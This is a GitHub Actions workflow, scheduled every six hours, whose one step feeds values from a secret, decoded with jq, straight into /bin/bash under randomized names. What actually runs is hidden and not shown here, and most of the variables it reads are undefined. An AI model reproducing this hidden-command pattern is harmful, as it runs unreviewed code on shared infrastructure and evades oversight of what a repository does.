name: beidabx

on:
  workflow_dispatch:
  schedule:
    - cron: '25 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: beidabx
        env:
          li38: ${{ secrets.li38 }}
        run: |
          echo $li38 | jq -r .kuya11111 | /bin/bash
          echo $jdz5849 | jq -r .bioq66424 | /bin/bash
          echo $qjj162 | jq -r .wouqn0 | /bin/bash
          echo $g325 | jq -r .q594 | /bin/bash
          echo $cdlnd43 | jq -r .vc972 | /bin/bash
          echo $j01 | jq -r .o39 | /bin/bash
          echo $ip779 | jq -r .ynzyh1041 | /bin/bash
          echo $n1336 | jq -r .e384 | /bin/bash
          echo $oh905 | jq -r .j9 | /bin/bash

